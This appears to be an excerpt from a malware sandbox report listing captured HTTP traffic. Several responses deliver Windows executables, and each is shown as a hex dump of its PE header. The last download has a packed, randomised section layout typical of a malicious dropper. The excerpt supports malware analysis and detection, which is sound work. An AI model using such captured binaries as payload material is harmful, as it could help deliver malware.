0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:22 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jun 2024 06:16:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jun 2024 06:16:30 GMTContent-Type: application/octet-streamContent-Length: 1917952Last-Modified: Wed, 26 Jun 2024 05:57:13 GMTConnection: keep-aliveETag: "667badb9-1d4400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 13 50 4a 58 72 3e 19 58 72 3e 19 58 72 3e 19 03 1a 3d 18 56 72 3e 19 03 1a 3b 18 f8 72 3e 19 8d 1f 3a 18 4a 72 3e 19 8d 1f 3d 18 4e 72 3e 19 8d 1f 3b 18 2d 72 3e 19 03 1a 3a 18 4c 72 3e 19 03 1a 3f 18 4b 72 3e 19 58 72 3f 19 8c 72 3e 19 c3 1c 37 18 59 72 3e 19 c3 1c c1 19 59 72 3e 19 c3 1c 3c 18 59 72 3e 19 52 69 63 68 58 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 57 59 50 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 dc 04 00 00 c4 01 00 00 00 00 00 00 e0 4b 00 00 10 00 00 00 f0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4c 00 00 04 00 00 32 e8 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 80 06 00 6a 00 00 00 00 70 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 cc 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 cc 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 06 00 00 10 00 00 00 d8 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 70 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 63 61 6a 6f 73 64 69 00 30 1a 00 00 a0 31 00 00 30 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6c 69 76 67 72 77 79 00 10 00 00 00 d0 4b 00 00 04 00 00 00 1e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4b 00 00 22 00 00 00 22 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
